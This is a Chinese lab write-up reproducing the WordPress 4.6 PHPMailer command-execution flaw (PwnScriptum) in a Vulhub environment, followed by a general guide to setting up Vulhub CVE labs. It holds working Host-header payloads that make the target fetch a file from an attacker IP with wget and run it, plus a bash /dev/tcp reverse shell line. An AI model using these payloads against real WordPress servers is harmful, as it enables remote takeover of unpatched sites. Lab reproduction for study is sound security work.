Vulhub靶场WordPress4.6命令执行(PwnScriptum)漏洞复现

免责声明:本文仅用于技术交流和知识分享目的。漏洞复现涉及到系统和网络的安全性测试,可能导致系统崩溃、数据丢失或其他问题。读者在尝试漏洞复现之前必须获得合法授权,并自行承担一切风险和责任。

漏洞描述:

WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。WordPress会使用PHPMailer组件发送邮件,攻击者在找回密码时通过PHPMailer组件发送重置密码的邮件,利用substr,run等函数构造payload,可造成命令执行漏洞。

漏洞影响版本:

WordPress <= 4.6.0 PHPMailer < 5.2.18

漏洞复现版本:

WordPress = 4.6.0

复现过程:

1:使用vulhub中靶场启动环境

2:浏览器访问http://your-ip:8080

3:点击安装 填写用户名等其他信息 用户名后续需要被用到

 4:安装完成后 点击登录回到首页 点击忘记密码

5:输入之前注册的用户名 点击获取新密码并抓取此时数据包

6:替换Host中内容为如下payload

aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}192.168.10.63${substr{0}{1}{$spool_directory}}1.txt}} null

7:其中192.168.10.63为本地攻击机地址,在此攻击机上启动一个http服务用以靶机下载反弹shell的文件1.txt

文件名称为1.txt 文件内容为反弹shell的命令

bash -i  >&  /dev/tcp/192.168.10.63/20000  0>&1

注:此时提供http服务的虚拟机和获取反弹shell的虚拟机为同一台,所以在burp的payload中出现的IP地址和1.txt内容中的IP地址为同一个

8:payload正常执行放回302之后 可以进入靶机的容器相关目录查看是否有文件生成

执行 sudo docker ps -a      获取容器ID

执行 sudo docker exec -it 容器ID  /bin/bash   进入容器

检查shell内容是否正常

注:如果此时shell的文件大小为0、内容为空,说明shell没有正常正常从攻击机上下载到靶机,检查第7步中的http服务端口与payload中的端口是否一致。

9:如靶机中正常有shell文件,首先在攻击机上起一个nc监听

在burp中发送如下payload执行shell文件

aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell}} null)

10:监听收到反弹shell如下

 

 

 

 

 

 

### Vulhub靶场中CVE漏洞复现方法 #### 准备工作 为了在Vulhub靶场中成功复现CVE漏洞,需先搭建好环境。这通常涉及安装Docker以及配置网络设置以确保攻击机和靶机能相互通信[^1]。 对于具体的漏洞复现案例,比如MySQL类型的CVE-2012-2122,在开始之前要确认已经按照官方文档完成了必要的准备工作,包括但不限于正确设置了Docker版本和支持组件;同时也要注意检查目标系统的内核参数是否满足实验需求[^3]。 #### 复现流程概述 当准备就绪后,可以通过如下方式启动特定的漏洞场景: 1. **获取并构建镜像** 使用`git clone`命令下载Vulhub项目仓库到本地计算机上; 接着进入对应目录下(例如针对某个具体应用),通过执行`docker-compose up -d`来拉取所需的基础镜像并完成服务部署。 2. **验证环境状态** 利用`docker ps`查看正在运行的服务实例列表,确保所选的应用程序已被正常加载且处于监听状态。 3. **实施攻击测试** 根据选定的CVE编号查阅相关资料了解其利用原理和技术细节,然后编写相应的脚本或手动操作尝试触发该缺陷。例如,在处理Webmin(CVE-2019-15107)时可能会采用反向Shell的方式建立远程控制连接[^5]。 4. **分析结果反馈** 成功触发漏洞之后应当仔细观察系统行为变化,并收集日志文件用于后续研究学习。如果遇到困难,则可参照社区分享的经验贴寻求解决方案。 ```bash # 下载Vulhub项目 git clone https://github.com/vulhub/vulhub.git # 启动指定漏洞环境 cd vulhub/<app_name> docker-compose up -d ``` #### 实际例子说明 以ActiveMQ为例[CVE-2017-3066],此漏洞允许未经身份验证的用户发送恶意JMS消息从而实现任意代码执行。为重现这一过程,除了上述通用步骤外还需要特别关注如何构造有效的payload数据包以便于被服务器端解析成危险指令集。 同样地,在探讨Confluence相关的多个CVE条目时,如CVE-2023-26360, CVE-2023-29300等,重点在于理解各自影响范围内的功能模块特性及其可能存在的安全隐患点,进而设计针对性强的有效负载来进行实战演练[^2]。 #### 注意事项 在整个过程中务必保持谨慎态度对待网络安全法规和个人隐私保护政策,仅限于合法授权范围内开展此类实践活动。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值